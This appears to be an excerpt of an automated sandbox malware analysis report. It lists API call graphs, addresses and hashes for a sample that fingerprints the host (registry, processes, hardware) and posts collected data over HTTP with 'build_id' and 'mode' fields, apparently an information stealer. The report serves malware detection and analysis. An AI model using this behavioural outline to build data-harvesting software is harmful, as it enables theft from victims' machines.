62285->62286 62286->61746 62287 40fa9c _EH_prolog lstrlenA lstrcpy lstrcat 62287->62289 62288 40f9e1 lstrcpy 62288->62289 62289->62283 62289->62284 62289->62287 62289->62288 62290->61759 62292 40fce0 62291->62292 62293 40fcc4 wsprintfA 62291->62293 62292->61774 62293->62292 62295 40fe73 62294->62295 62296 40fe5b RegQueryValueExA 62294->62296 62295->61792 62296->62295 62298 40ff06 GetLogicalProcessorInformationEx 62297->62298 62299 40fedc GetLastError 62298->62299 62302 40ff11 62298->62302 62300 40ff65 62299->62300 62301 40fee7 62299->62301 62307 40ff6f 62300->62307 62383 410ade GetProcessHeap HeapFree 62300->62383 62309 40feeb 62301->62309 62382 410ade GetProcessHeap HeapFree 62302->62382 62307->61806 62308 40ff38 62308->62307 62310 40ff3e wsprintfA 62308->62310 62309->62298 62311 40ff5e 62309->62311 62380 410ade GetProcessHeap HeapFree 62309->62380 62381 410afb GetProcessHeap HeapAlloc 62309->62381 62310->62307 62311->62307 62312->61819 62384 410aa7 62313->62384 62316 40ffc1 wsprintfA 62316->61833 62319 40f923 lstrcpy 62318->62319 62323 410010 62319->62323 62320 41004c EnumDisplayDevicesA 62321 410061 62320->62321 62320->62323 62321->61848 62322 40f997 2 API calls 62322->62323 62323->62320 62323->62321 62323->62322 62325 40f923 lstrcpy 62324->62325 62326 4102ed CreateToolhelp32Snapshot Process32First 62325->62326 62327 410386 CloseHandle 62326->62327 62331 41031e 62326->62331 62327->61861 62328 410372 Process32Next 62328->62327 62328->62331 62329 40fa9c _EH_prolog lstrlenA lstrcpy lstrcat 62329->62331 62330 40f9e1 lstrcpy 62330->62331 62331->62328 62331->62329 62331->62330 62333 40f923 lstrcpy 62332->62333 62334 410095 RegOpenKeyExA 62333->62334 62335 4100c8 62334->62335 62347 4100e7 62334->62347 62337 40f95a lstrcpy 62335->62337 62336 4100f0 RegEnumKeyExA 62338 410119 wsprintfA RegOpenKeyExA 62336->62338 62336->62347 62343 4100d4 62337->62343 62339 410283 62338->62339 62340 41015d RegQueryValueExA 62338->62340 62342 40f95a lstrcpy 62339->62342 62341 410187 lstrlenA 62340->62341 62340->62347 62341->62347 62342->62343 62343->61875 62344 4101f2 RegQueryValueExA 62344->62347 62345 40fa9c _EH_prolog lstrlenA lstrcpy lstrcat 62345->62347 62346 40f9e1 lstrcpy 62346->62347 62347->62336 62347->62339 62347->62344 62347->62345 62347->62346 62386 413460 _EH_prolog 62348->62386 62350 41445a 62351 40f9e1 lstrcpy 62350->62351 62352 41447c 62351->62352 62353 40f9e1 lstrcpy 62352->62353 62354 4144a0 62353->62354 62355 40f9e1 lstrcpy 62354->62355 62356 4144ac 62355->62356 62357 40f9e1 lstrcpy 62356->62357 62358 4144b8 62357->62358 62359 4144bf Sleep 62358->62359 62360 4144cf CreateThread WaitForSingleObject 62358->62360 62359->62358 62361 40f923 lstrcpy 62360->62361 62390 413326 _EH_prolog 62360->62390 62362 4144fd 62361->62362 62388 4134ac _EH_prolog 62362->62388 62364 414510 62365 401061 _EH_prolog 62364->62365 62366 41451c 62365->62366 62366->61897 62370 40fb50 GetProcessHeap HeapAlloc RegOpenKeyExA 62367->62370 62369 40fbc2 62369->62245 62369->62246 62371 40fb93 RegQueryValueExA 62370->62371 62372 40fbaa 62370->62372 62371->62372 62372->62369 62374 410758 62373->62374 62375 4106fa SysAllocString 62373->62375 62374->62258 62375->62374 62377 410709 62375->62377 62376 410751 SysFreeString 62376->62374 62377->62376 62378 410735 _wtoi64 SysFreeString 62377->62378 62378->62376 62379->62271 62380->62309 62381->62309 62382->62308 62383->62307 62385 40ffab GlobalMemoryStatusEx 62384->62385 62385->62316 62387 413479 62386->62387 62387->62350 62389 4134cc 62388->62389 62389->62364 62399 40fb4d 62390->62399 62392 413347 lstrlenA 62393 413353 62392->62393 62394 41335e 62392->62394 62395 40f95a lstrcpy 62394->62395 62397 40f9e1 lstrcpy 62394->62397 62398 413406 StrCmpCA 62394->62398 62400 4043ad _EH_prolog 62394->62400 62395->62394 62397->62394 62398->62393 62398->62394 62399->62392 62401 40f95a lstrcpy 62400->62401 62402 4043dd 62401->62402 62403 403a54 6 API calls 62402->62403 62404 4043e9 62403->62404 62605 410dac 62404->62605 62406 404415 62407 404420 lstrlenA 62406->62407 62408 404430 62407->62408 62409 410dac 4 API calls 62408->62409 62410 40443e 62409->62410 62411 40f923 lstrcpy 62410->62411 62412 40444e 62411->62412 62413 40f923 lstrcpy 62412->62413 62414 40445f 62413->62414 62415 40f923 lstrcpy 62414->62415 62416 404470 62415->62416 62417 40f923 lstrcpy 62416->62417 62418 404481 62417->62418 62419 40f923 lstrcpy 62418->62419 62420 404492 StrCmpCA 62419->62420 62422 4044ae 62420->62422 62421 4044d4 62423 410b5c 3 API calls 62421->62423 62422->62421 62424 4044c3 InternetOpenA 62422->62424 62425 4044df 62423->62425 62424->62421 62435 404cf2 62424->62435 62426 40fa28 3 API calls 62425->62426 62427 4044f5 62426->62427 62428 40f9e1 lstrcpy 62427->62428 62429 404502 62428->62429 62430 40fa9c 4 API calls 62429->62430 62431 40452e 62430->62431 62432 40fa28 3 API calls 62431->62432 62433 404544 62432->62433 62437 40f95a lstrcpy 62435->62437 62448 404c4e 62437->62448 62448->62394 62606 410dbd CryptBinaryToStringA 62605->62606 62607 410db9 62605->62607 62606->62607 62608 410dda GetProcessHeap HeapAlloc 62606->62608 62607->62406 62608->62607 62609 410df7 CryptBinaryToStringA 62608->62609 62609->62607 62618->61906 62978 4060a4 62619->62978 62621 4060ea 62621->61954 62979 4060af 62978->62979 62982 405f70 62979->62982 62981 4060c0 62981->62621 62985 405e09 62982->62985 62986 405e22 62985->62986 62987 405e1a 62985->62987 63001 4059a0 62986->63001 62987->62981 63003 4059af 63001->63003 63002 4059b6 63002->62987 63007 405a53 63002->63007 63003->63002 63004 405a06 63003->63004 63028 410afb GetProcessHeap HeapAlloc 63004->63028 64126 6cc6b694 64127 6cc6b6a0 ___scrt_is_nonwritable_in_current_image 64126->64127 64156 6cc6af2a 64127->64156 64129 6cc6b6a7 64130 6cc6b796 64129->64130 64131 6cc6b6d1 64129->64131 64135 6cc6b6ac ___scrt_is_nonwritable_in_current_image 64129->64135 64173 6cc6b1f7 IsProcessorFeaturePresent 64130->64173 64160 6cc6b064 64131->64160 64134 6cc6b6e0 __RTC_Initialize 64134->64135 64163 6cc6bf89 InitializeSListHead 64134->64163 64136 6cc6b7b3 ___scrt_uninitialize_crt __RTC_Initialize 64138 6cc6b6ee ___scrt_initialize_default_local_stdio_options 64142 6cc6b6f3 _initterm_e 64138->64142 64139 6cc6b79d ___scrt_is_nonwritable_in_current_image 64139->64136 64140 6cc6b7d2 64139->64140 64141 6cc6b828 64139->64141 64177 6cc6b09d _execute_onexit_table _cexit ___scrt_release_startup_lock 64140->64177 64144 6cc6b1f7 ___scrt_fastfail 6 API calls 64141->64144 64142->64135 64145 6cc6b708 64142->64145 64148 6cc6b82f 64144->64148 64164 6cc6b072 64145->64164 64147 6cc6b7d7 64178 6cc6bf95 __std_type_info_destroy_list 64147->64178 64152 6cc6b86e dllmain_crt_process_detach 64148->64152 64153 6cc6b83b 64148->64153 64149 6cc6b70d 64149->64135 64151 6cc6b711 _initterm 64149->64151 64151->64135 64155 6cc6b840 64152->64155 64154 6cc6b860 dllmain_crt_process_attach 64153->64154 64153->64155 64154->64155 64157 6cc6af33 64156->64157 64179 6cc6b341 IsProcessorFeaturePresent 64157->64179 64159 6cc6af3f ___scrt_uninitialize_crt 64159->64129 64180 6cc6af8b 64160->64180 64162 6cc6b06b 64162->64134 64163->64138 64165 6cc6b077 ___scrt_release_startup_lock 64164->64165 64166 6cc6b082 64165->64166 64167 6cc6b07b 64165->64167 64170 6cc6b087 _configure_narrow_argv 64166->64170 64190 6cc6b341 IsProcessorFeaturePresent 64167->64190 64169 6cc6b080 64169->64149 64171 6cc6b095 _initialize_narrow_environment 64170->64171 64172 6cc6b092 64170->64172 64171->64169 64172->64149 64174 6cc6b20c ___scrt_fastfail 64173->64174 64175 6cc6b218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 64174->64175 64176 6cc6b302 ___scrt_fastfail 64175->64176 64176->64139 64177->64147 64178->64136 64179->64159 64181 6cc6af9e 64180->64181 64182 6cc6af9a 64180->64182 64183 6cc6b028 64181->64183 64185 6cc6afab ___scrt_release_startup_lock 64181->64185 64182->64162 64184 6cc6b1f7 ___scrt_fastfail 6 API calls 64183->64184 64186 6cc6b02f 64184->64186 64187 6cc6afb8 _initialize_onexit_table 64185->64187 64188 6cc6afd6 64185->64188 64187->64188 64189 6cc6afc7 _initialize_onexit_table 64187->64189 64188->64162 64189->64188 64190->64169 64191 6cc335a0 64192 6cc335c4 InitializeCriticalSectionAndSpinCount getenv 64191->64192 64207 6cc33846 __aulldiv 64191->64207 64193 6cc338fc strcmp 64192->64193 64206 6cc335f3 __aulldiv 64192->64206 64197 6cc33912 strcmp 64193->64197 64193->64206 64195 6cc335f8 QueryPerformanceFrequency 64195->64206 64196 6cc338f4 64197->64206 64198 6cc33622 _strnicmp 64199 6cc33944 _strnicmp 64198->64199 64198->64206 64201 6cc3395d 64199->64201 64199->64206 64200 6cc3376a QueryPerformanceCounter EnterCriticalSection 64203 6cc337b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 64200->64203 64204 6cc3375c 64200->64204 64202 6cc33664 GetSystemTimeAdjustment 64202->64206 64203->64204 64205 6cc337fc LeaveCriticalSection 64203->64205 64204->64200 64204->64203 64204->64205 64204->64207 64205->64204 64205->64207 64206->64195 64206->64198 64206->64199 64206->64201 64206->64202 64206->64204 64208 6cc6b320 5 API calls ___raise_securityfailure 64207->64208 64208->64196 64209 6cc33060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 64214 6cc6ab2a 64209->64214 64213 6cc330db 64218 6cc6ae0c _crt_atexit _register_onexit_function 64214->64218 64216 6cc330cd 64217 6cc6b320 5 API calls ___raise_securityfailure 64216->64217 64217->64213 64218->64216 64219 6cc4c930 GetSystemInfo VirtualAlloc 64220 6cc4c9a3 GetSystemInfo 64219->64220 64226 6cc4c973 64219->64226 64222 6cc4c9b6 64220->64222 64223 6cc4c9d0 64220->64223 64222->64223 64225 6cc4c9bd 64222->64225 64223->64226 64227 6cc4c9d8 VirtualAlloc 64223->64227 64224 6cc4c99b 64225->64226 64228 6cc4c9c1 VirtualFree 64225->64228 64235 6cc6b320 5 API calls ___raise_securityfailure 64226->64235 64229 6cc4c9f0 64227->64229 64230 6cc4c9ec 64227->64230 64228->64226 64236 6cc6cbe8 GetCurrentProcess TerminateProcess 64229->64236 64230->64226 64235->64224 64237 6cc6b9c0 64238 6cc6b9ce dllmain_dispatch 64237->64238 64239 6cc6b9c9 64237->64239 64241 6cc6bef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 64239->64241 64241->64238 64242 4138e7 64243 4138f2 64242->64243 64244 401061 _EH_prolog 64243->64244 64245 4138fe 64244->64245 64246 6cc6b830 64247 6cc6b86e dllmain_crt_process_detach 64246->64247 64248 6cc6b83b 64246->64248 64250 6cc6b840 64247->64250 64249 6cc6b860 dllmain_crt_process_attach 64248->64249 64248->64250 64249->64250 64251 6cc6b8ae 64254 6cc6b8ba ___scrt_is_nonwritable_in_current_image 64251->64254 64252 6cc6b8c9 64253 6cc6b8e3 dllmain_raw 64253->64252 64255 6cc6b8fd dllmain_crt_dispatch 64253->64255 64254->64252 64254->64253 64256 6cc6b8de 64254->64256 64255->64252 64255->64256 64264 6cc4bed0 DisableThreadLibraryCalls LoadLibraryExW 64256->64264 64258 6cc6b91e 64259 6cc6b94a 64258->64259 64265 6cc4bed0 DisableThreadLibraryCalls LoadLibraryExW 64258->64265 64259->64252 64260 6cc6b953 dllmain_crt_dispatch 64259->64260 64260->64252 64262 6cc6b966 dllmain_raw 64260->64262 64262->64252 64263 6cc6b936 dllmain_crt_dispatch dllmain_raw 64263->64259 64264->64258 64265->64263

                                                                                    Executed Functions

                                                                                    Function 00417645 Relevance: 207.0, APIs: 114, Strings: 4, Instructions: 490libraryloaderCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(76210000,00416AAC), ref: 00417659
                                                                                    • GetProcAddress.KERNEL32 ref: 00417670
                                                                                    • GetProcAddress.KERNEL32 ref: 00417687
                                                                                    • GetProcAddress.KERNEL32 ref: 0041769E
                                                                                    • GetProcAddress.KERNEL32 ref: 004176B5
                                                                                    • GetProcAddress.KERNEL32 ref: 004176CC
                                                                                    • GetProcAddress.KERNEL32 ref: 004176E3
                                                                                    • GetProcAddress.KERNEL32 ref: 004176FA
                                                                                    • GetProcAddress.KERNEL32 ref: 00417711
                                                                                    • GetProcAddress.KERNEL32 ref: 00417728
                                                                                    • GetProcAddress.KERNEL32 ref: 0041773F
                                                                                    • GetProcAddress.KERNEL32 ref: 00417756
                                                                                    • GetProcAddress.KERNEL32 ref: 0041776D
                                                                                    • GetProcAddress.KERNEL32 ref: 00417784
                                                                                    • GetProcAddress.KERNEL32 ref: 0041779B
                                                                                    • GetProcAddress.KERNEL32 ref: 004177B2
                                                                                    • GetProcAddress.KERNEL32 ref: 004177C9
                                                                                    • GetProcAddress.KERNEL32 ref: 004177E0
                                                                                    • GetProcAddress.KERNEL32 ref: 004177F7
                                                                                    • GetProcAddress.KERNEL32 ref: 0041780E
                                                                                    • GetProcAddress.KERNEL32 ref: 00417825
                                                                                    • GetProcAddress.KERNEL32 ref: 0041783C
                                                                                    • GetProcAddress.KERNEL32 ref: 00417853
                                                                                    • GetProcAddress.KERNEL32 ref: 0041786A
                                                                                    • GetProcAddress.KERNEL32 ref: 00417881
                                                                                    • GetProcAddress.KERNEL32 ref: 00417898
                                                                                    • GetProcAddress.KERNEL32 ref: 004178AF
                                                                                    • GetProcAddress.KERNEL32 ref: 004178C6
                                                                                    • GetProcAddress.KERNEL32 ref: 004178DD
                                                                                    • GetProcAddress.KERNEL32 ref: 004178F4
                                                                                    • GetProcAddress.KERNEL32 ref: 0041790B
                                                                                    • GetProcAddress.KERNEL32 ref: 00417922
                                                                                    • GetProcAddress.KERNEL32 ref: 00417939
                                                                                    • GetProcAddress.KERNEL32 ref: 00417950
                                                                                    • GetProcAddress.KERNEL32 ref: 00417967
                                                                                    • GetProcAddress.KERNEL32 ref: 0041797E
                                                                                    • GetProcAddress.KERNEL32 ref: 00417995
                                                                                    • GetProcAddress.KERNEL32 ref: 004179AC
                                                                                    • GetProcAddress.KERNEL32 ref: 004179C3
                                                                                    • GetProcAddress.KERNEL32 ref: 004179DA
                                                                                    • GetProcAddress.KERNEL32 ref: 004179F1
                                                                                    • GetProcAddress.KERNEL32 ref: 00417A08
                                                                                    • GetProcAddress.KERNEL32 ref: 00417A1F
                                                                                    • LoadLibraryA.KERNEL32(00416AAC,?,00000040,00000064,0041366A,00412D12,?,0000002C,00000064,004135E9,00413626,?,00000024,00000064,Function_000135AC,00413295), ref: 00417A30
                                                                                    • LoadLibraryA.KERNEL32 ref: 00417A41
                                                                                    • LoadLibraryA.KERNEL32 ref: 00417A52
                                                                                    • LoadLibraryA.KERNEL32 ref: 00417A63
                                                                                    • LoadLibraryA.KERNEL32 ref: 00417A74
                                                                                    • LoadLibraryA.KERNEL32 ref: 00417A85
                                                                                    • LoadLibraryA.KERNEL32 ref: 00417A96
                                                                                    • LoadLibraryA.KERNEL32 ref: 00417AA7
                                                                                    • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00417AB7
                                                                                    • GetProcAddress.KERNEL32(751E0000), ref: 00417AD2
                                                                                    • GetProcAddress.KERNEL32 ref: 00417AE9
                                                                                    • GetProcAddress.KERNEL32 ref: 00417B00
                                                                                    • GetProcAddress.KERNEL32 ref: 00417B17
                                                                                    • GetProcAddress.KERNEL32 ref: 00417B2E
                                                                                    • GetProcAddress.KERNEL32(70150000), ref: 00417B4D
                                                                                    • GetProcAddress.KERNEL32 ref: 00417B64
                                                                                    • GetProcAddress.KERNEL32 ref: 00417B7B
                                                                                    • GetProcAddress.KERNEL32 ref: 00417B92
                                                                                    • GetProcAddress.KERNEL32 ref: 00417BA9
                                                                                    • GetProcAddress.KERNEL32 ref: 00417BC0
                                                                                    • GetProcAddress.KERNEL32 ref: 00417BD7
                                                                                    • GetProcAddress.KERNEL32 ref: 00417BEE
                                                                                    • GetProcAddress.KERNEL32(753A0000), ref: 00417C09
                                                                                    • GetProcAddress.KERNEL32 ref: 00417C20
                                                                                    • GetProcAddress.KERNEL32 ref: 00417C37
                                                                                    • GetProcAddress.KERNEL32 ref: 00417C4E
                                                                                    • GetProcAddress.KERNEL32 ref: 00417C65
                                                                                    • GetProcAddress.KERNEL32(76310000), ref: 00417C84
                                                                                    • GetProcAddress.KERNEL32 ref: 00417C9B
                                                                                    • GetProcAddress.KERNEL32 ref: 00417CB2
                                                                                    • GetProcAddress.KERNEL32 ref: 00417CC9
                                                                                    • GetProcAddress.KERNEL32 ref: 00417CE0
                                                                                    • GetProcAddress.KERNEL32 ref: 00417CF7
                                                                                    • GetProcAddress.KERNEL32(76910000), ref: 00417D16
                                                                                    • GetProcAddress.KERNEL32 ref: 00417D2D
                                                                                    • GetProcAddress.KERNEL32 ref: 00417D44
                                                                                    • GetProcAddress.KERNEL32 ref: 00417D5B
                                                                                    • GetProcAddress.KERNEL32 ref: 00417D72
                                                                                    • GetProcAddress.KERNEL32 ref: 00417D89
                                                                                    • GetProcAddress.KERNEL32 ref: 00417DA0
                                                                                    • GetProcAddress.KERNEL32 ref: 00417DB7
                                                                                    • GetProcAddress.KERNEL32 ref: 00417DCE
                                                                                    • GetProcAddress.KERNEL32(75B30000), ref: 00417DE9
                                                                                    • GetProcAddress.KERNEL32 ref: 00417E00
                                                                                    • GetProcAddress.KERNEL32 ref: 00417E17
                                                                                    • GetProcAddress.KERNEL32 ref: 00417E2E
                                                                                    • GetProcAddress.KERNEL32 ref: 00417E45
                                                                                    • GetProcAddress.KERNEL32(75670000), ref: 00417E60
                                                                                    • GetProcAddress.KERNEL32 ref: 00417E77
                                                                                    • GetProcAddress.KERNEL32(76AC0000), ref: 00417E92
                                                                                    • GetProcAddress.KERNEL32 ref: 00417EA9
                                                                                    • GetProcAddress.KERNEL32(6F500000), ref: 00417EC8
                                                                                    • GetProcAddress.KERNEL32 ref: 00417EDF
                                                                                    • GetProcAddress.KERNEL32 ref: 00417EF6
                                                                                    • GetProcAddress.KERNEL32 ref: 00417F0D
                                                                                    • GetProcAddress.KERNEL32 ref: 00417F24
                                                                                    • GetProcAddress.KERNEL32 ref: 00417F3B
                                                                                    • GetProcAddress.KERNEL32 ref: 00417F52
                                                                                    • GetProcAddress.KERNEL32 ref: 00417F69
                                                                                    • GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00417F7F
                                                                                    • GetProcAddress.KERNEL32(InternetSetOptionA), ref: 00417F95
                                                                                    • GetProcAddress.KERNEL32(75AE0000), ref: 00417FB0
                                                                                    • GetProcAddress.KERNEL32 ref: 00417FC7
                                                                                    • GetProcAddress.KERNEL32 ref: 00417FDE
                                                                                    • GetProcAddress.KERNEL32 ref: 00417FF5
                                                                                    • GetProcAddress.KERNEL32(76300000), ref: 00418010
                                                                                    • GetProcAddress.KERNEL32(6E7D0000), ref: 0041802B
                                                                                    • GetProcAddress.KERNEL32 ref: 00418042
                                                                                    • GetProcAddress.KERNEL32 ref: 00418059
                                                                                    • GetProcAddress.KERNEL32 ref: 00418070
                                                                                    • GetProcAddress.KERNEL32(6CFB0000,SymMatchString), ref: 0041808A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                    • String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
                                                                                    • API String ID: 2238633743-951535364
                                                                                    • Opcode ID: e99d2a3dd66da67205f3114fc9aaaece5a66dc5c732b58a81b65daf475131747
                                                                                    • Instruction ID: 5d64eb95f993e10cfffcd180ca7930ca50f89af3c14b7aa20224d1cce3759a27
                                                                                    • Opcode Fuzzy Hash: e99d2a3dd66da67205f3114fc9aaaece5a66dc5c732b58a81b65daf475131747
                                                                                    • Instruction Fuzzy Hash: 0042D97E811620EFEB929FA0FD48A653BB3F70AB01B147439FA0586231D7364865EF54
                                                                                    Function 0040514C Relevance: 54.9, APIs: 21, Strings: 10, Instructions: 640networkstringmemoryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 605 40514c-40521b _EH_prolog call 40f95a call 403a54 call 40f923 * 5 call 40fb4d InternetOpenA StrCmpCA 622 40521d 605->622 623 40521f-405222 605->623 622->623 624 4058d8-4058fe InternetCloseHandle call 40fb4d call 406242 623->624 625 405228-4053a6 call 410b5c call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 2 InternetConnectA 623->625 634 405900-40592d call 40f997 call 40fa9c call 40f9e1 call 40f98e 624->634 635 405932-40599f call 410a94 * 2 call 40f98e * 4 call 401061 call 40f98e 624->635 625->624 705 4053ac-4053dd HttpOpenRequestA 625->705 634->635 706 4053e3-4053e5 705->706 707 4058cf-4058d2 InternetCloseHandle 705->707 708 4053e7-4053f7 InternetSetOptionA 706->708 709 4053fd-405875 call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4020f3 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fb4d lstrlenA call 40fb4d lstrlenA GetProcessHeap HeapAlloc call 40fb4d lstrlenA call 40fb4d memcpy call 40fb4d lstrlenA call 40fb4d * 2 lstrlenA memcpy call 40fb4d lstrlenA call 40fb4d HttpSendRequestA 706->709 707->624 708->709 868 4058b1-4058c6 InternetReadFile 709->868 869 405877-40587c 868->869 870 4058c8-4058c9 InternetCloseHandle 868->870 869->870 871 40587e-4058ac call 40fa9c call 40f9e1 call 40f98e 869->871 870->707 871->868
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00405151
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                      • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                      • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004051FC
                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040539B
                                                                                    • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 004053D2
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,mode,00000000,?,00000000,?,00425AC8,00000000), ref: 004057CC
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004057DD
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004057E7
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 004057EE
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004057FF
                                                                                    • memcpy.MSVCRT ref: 00405810
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00405821
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 0040583A
                                                                                    • memcpy.MSVCRT ref: 00405843
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405856
                                                                                    • HttpSendRequestA.WININET(?,00000000,00000000), ref: 0040586A
                                                                                    • InternetReadFile.WININET(?,?,000000C7,?), ref: 004058BE
                                                                                    • InternetCloseHandle.WININET(?), ref: 004058C9
                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004053F7
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                    • InternetCloseHandle.WININET(?), ref: 004058D2
                                                                                    • InternetCloseHandle.WININET(?), ref: 004058DB
                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00405213
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internetlstrlen$lstrcpy$H_prolog$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileOptionProcessReadSend
                                                                                    • String ID: "$"$"$($------$------$------$------$build_id$mode
                                                                                    • API String ID: 2237346945-1447386369
